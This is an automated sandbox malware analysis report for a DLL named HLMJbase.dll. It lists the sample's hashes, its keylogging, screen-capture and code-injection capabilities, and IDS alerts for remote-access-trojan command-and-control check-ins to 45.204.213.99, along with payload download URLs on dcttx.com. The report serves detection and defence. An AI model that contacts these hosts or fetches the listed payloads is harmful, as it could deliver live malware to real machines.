Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HLMJbase.dll

Overview

General Information

Sample name:HLMJbase.dll
Analysis ID:1579416
MD5:250eb1ef1645f13252ef13c14ba66d51
SHA1:4aa14d113af1d74fbd1adbc16c10126b69878d0b
SHA256:dacdac1e333a1f45700e3707e617ff49c457226604f1ffa160fc3faf9b6810b3
Tags:dlluser-smica83
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 7484 cmdline: loaddll32.exe "C:\Users\user\Desktop\HLMJbase.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7532 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7560 cmdline: rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7544 cmdline: rundll32.exe C:\Users\user\Desktop\HLMJbase.dll,NvOptimusEnablement MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 7796 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7544 -s 724 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 7668 cmdline: rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",NvOptimusEnablement MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-22T09:17:11.577682+010020528751A Network Trojan was detected192.168.2.44973945.204.213.997677TCP
2024-12-22T09:18:23.960106+010020528751A Network Trojan was detected192.168.2.44974645.204.213.997677TCP
2024-12-22T09:19:34.451747+010020528751A Network Trojan was detected192.168.2.44993345.204.213.997688TCP
2024-12-22T09:20:58.342264+010020528751A Network Trojan was detected192.168.2.45003045.204.213.997677TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBDE8E0 EncryptMessage,3_2_6CBDE8E0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBB0332 DecryptMessage,3_2_6CBB0332
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBD9840 DecryptMessage,memset,3_2_6CBD9840
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBD961E EncryptMessage,3_2_6CBD961E
Source: HLMJbase.dllStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: HLMJbase.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: HLMJbase.pdb source: rundll32.exe, 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4184561254.000000006CC06000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.4183830787.000000006CC06000.00000002.00000001.01000000.00000003.sdmp, HLMJbase.dll
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: z:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: x:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: v:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: t:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: r:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: p:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: n:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: l:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: j:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: h:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: f:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: b:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: y:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: w:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: u:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: s:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: q:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: o:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: m:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: k:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: i:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: g:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: e:Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: c:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: [:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054C8060 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,4_2_054C8060

Networking

barindex
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49739 -> 45.204.213.99:7677
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49746 -> 45.204.213.99:7677
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49933 -> 45.204.213.99:7688
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:50030 -> 45.204.213.99:7677
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 38.147.186.138 443Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.204.213.99 7688Jump to behavior
Source: global trafficTCP traffic: 192.168.2.4:49739 -> 45.204.213.99:7677
Source: global trafficHTTP traffic detected: GET /19/7.txt HTTP/1.1accept: */*host: dcttx.com
Source: global trafficHTTP traffic detected: GET /19/7.txt HTTP/1.1accept: */*host: dcttx.com
Source: global trafficHTTP traffic detected: GET /19/77.bin HTTP/1.1accept: */*host: dcttx.com
Source: global trafficHTTP traffic detected: GET /19/77.bin HTTP/1.1accept: */*host: dcttx.com
Source: global trafficHTTP traffic detected: GET /19/7.txt HTTP/1.1accept: */*host: dcttx.com
Source: global trafficHTTP traffic detected: GET /19/77.bin HTTP/1.1accept: */*host: dcttx.com
Source: Joe Sandbox ViewASN Name: CODECCLOUD-AS-APCodecCloudHKLimitedHK CODECCLOUD-AS-APCodecCloudHKLimitedHK
Source: Joe Sandbox ViewASN Name: ITACE-AS-APItaceInternationalLimitedHK ITACE-AS-APItaceInternationalLimitedHK
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBF84E7 recv,WSAGetLastError,3_2_6CBF84E7
Source: global trafficHTTP traffic detected: GET /19/7.txt HTTP/1.1accept: */*host: dcttx.com
Source: global trafficHTTP traffic detected: GET /19/7.txt HTTP/1.1accept: */*host: dcttx.com
Source: global trafficHTTP traffic detected: GET /19/77.bin HTTP/1.1accept: */*host: dcttx.com
Source: global trafficHTTP traffic detected: GET /19/77.bin HTTP/1.1accept: */*host: dcttx.com
Source: global trafficHTTP traffic detected: GET /19/7.txt HTTP/1.1accept: */*host: dcttx.com
Source: global trafficHTTP traffic detected: GET /19/77.bin HTTP/1.1accept: */*host: dcttx.com
Source: global trafficDNS traffic detected: DNS query: dcttx.com
Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
Source: rundll32.exe, 00000003.00000003.1739047373.0000000002888000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.2008105051.000000000284A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1738872358.0000000002CD7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1763776267.0000000002787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dcttx.com/19/7.txt
Source: rundll32.exe, 00000004.00000003.1738872358.0000000002CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dcttx.com/19/7.txt.
Source: rundll32.exe, 00000003.00000002.2008105051.000000000284A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dcttx.com/19/7.txtD
Source: rundll32.exe, rundll32.exe, 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4184561254.000000006CC06000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.4183830787.000000006CC06000.00000002.00000001.01000000.00000003.sdmp, HLMJbase.dllString found in binary or memory: https://dcttx.com/19/7.txtFailed
Source: rundll32.exe, 00000005.00000003.1763776267.0000000002787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dcttx.com/19/7.txtp
Source: rundll32.exe, 00000003.00000003.1770310682.0000000002887000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1739047373.0000000002888000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1738900816.00000000028C2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1738731092.0000000002D12000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1768941964.0000000002CD6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1738872358.0000000002CD7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4176037293.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1833709462.0000000002CBD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1763620953.00000000027C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1844676174.000000000276D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2355356834.000000000277B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2891476609.000000000277B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1763776267.0000000002787000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1795184851.000000000276D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3064884794.000000000277B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4176187047.000000000276C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2739932660.000000000277B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1795350329.0000000002785000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dcttx.com/19/77.bin
Source: rundll32.exe, 00000003.00000002.2008196874.0000000002888000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1770250771.000000000286B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1770310682.0000000002887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dcttx.com/19/77.bin.
Source: rundll32.exe, 00000003.00000002.2008196874.0000000002888000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1770250771.000000000286B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1770310682.0000000002887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dcttx.com/19/77.binH
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49737 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Windows\SysWOW64\rundll32.exeCode function: [esc]4_2_054CE7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: [esc]4_2_054CE7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: [esc]4_2_054CE7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: [esc]4_2_054CE7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: [esc]5_2_04E8E7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: [esc]5_2_04E8E7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: [esc]5_2_04E8E7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: [esc]5_2_04E8E7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054CE7B0 CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,4_2_054CE7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054CE7B0 CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,4_2_054CE7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054CBBF0 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,4_2_054CBBF0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054CE450 CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,4_2_054CE450
Source: C:\Windows\SysWOW64\rundll32.exeWindows user hook set: 0 mouse low level C:\Windows\System32\DINPUT8.dllJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB94854 NtCreateFile,RtlNtStatusToDosError,CreateIoCompletionPort,SetFileCompletionNotificationModes,GetLastError,CloseHandle,3_2_6CB94854
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB94268 NtDeviceIoControlFile,RtlNtStatusToDosError,3_2_6CB94268
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBE83D0 GetStdHandle,GetLastError,GetConsoleMode,NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,CloseHandle,3_2_6CBE83D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB93EDC NtCancelIoFileEx,RtlNtStatusToDosError,3_2_6CB93EDC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB94268: NtDeviceIoControlFile,RtlNtStatusToDosError,3_2_6CB94268
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054CB3D0 ExitWindowsEx,4_2_054CB3D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054CB3F4 ExitWindowsEx,4_2_054CB3F4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_054CB3AC ExitWindowsEx,4_2_054CB3AC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04E8B3F4 ExitWindowsEx,5_2_04E8B3F4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04E8B3D0 ExitWindowsEx,5_2_04E8B3D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04E8B3AC ExitWindowsEx,5_2_04E8B3AC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBD6D3C3_2_6CBD6D3C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBB481F3_2_6CBB481F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBBAA6C3_2_6CBBAA6C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBA84693_2_6CBA8469
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBD9CA83_2_6CBD9CA8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBB1C983_2_6CBB1C98
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB614AB3_2_6CB614AB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBC90A83_2_6CBC90A8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC02C953_2_6CC02C95
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBF4CCF3_2_6CBF4CCF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBA2D0F3_2_6CBA2D0F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB8EE053_2_6CB8EE05
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB7CF243_2_6CB7CF24
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBF48983_2_6CBF4898
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBB28F93_2_6CBB28F9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC028933_2_6CC02893
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB9A8143_2_6CB9A814
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB6E8753_2_6CB6E875
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB6CAD03_2_6CB6CAD0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBB8A773_2_6CBB8A77
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB90B403_2_6CB90B40
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB684303_2_6CB68430
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB9653C3_2_6CB9653C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBFA5083_2_6CBFA508
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB9255C3_2_6CB9255C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBDC6DA3_2_6CBDC6DA
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB666D93_2_6CB666D9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB7A64D3_2_6CB7A64D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBE87803_2_6CBE8780
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBC47193_2_6CBC4719
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB7C1AC3_2_6CB7C1AC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBE41F03_2_6CBE41F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBA62913_2_6CBA6291
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB8E3C73_2_6CB8E3C7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBF23503_2_6CBF2350
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBDDC973_2_6CBDDC97
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC03CF43_2_6CC03CF4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBDDCEB3_2_6CBDDCEB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBDDC7A3_2_6CBDDC7A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB6BDB13_2_6CB6BDB1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB61DF73_2_6CB61DF7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB79D263_2_6CB79D26
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBDBD1C3_2_6CBDBD1C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBEBD703_2_6CBEBD70
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB8DD453_2_6CB8DD45
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB85E163_2_6CB85E16
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBEDFFE3_2_6CBEDFFE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBC3F753_2_6CBC3F75
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBE9F403_2_6CBE9F40
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC018D73_2_6CC018D7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBBBA523_2_6CBBBA52
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBF9BE53_2_6CBF9BE5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBD5B143_2_6CBD5B14
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB854EF3_2_6CB854EF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBE347E3_2_6CBE347E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBAB5373_2_6CBAB537
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CB6F61C3_2_6CB6F61C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBA56743_2_6CBA5674
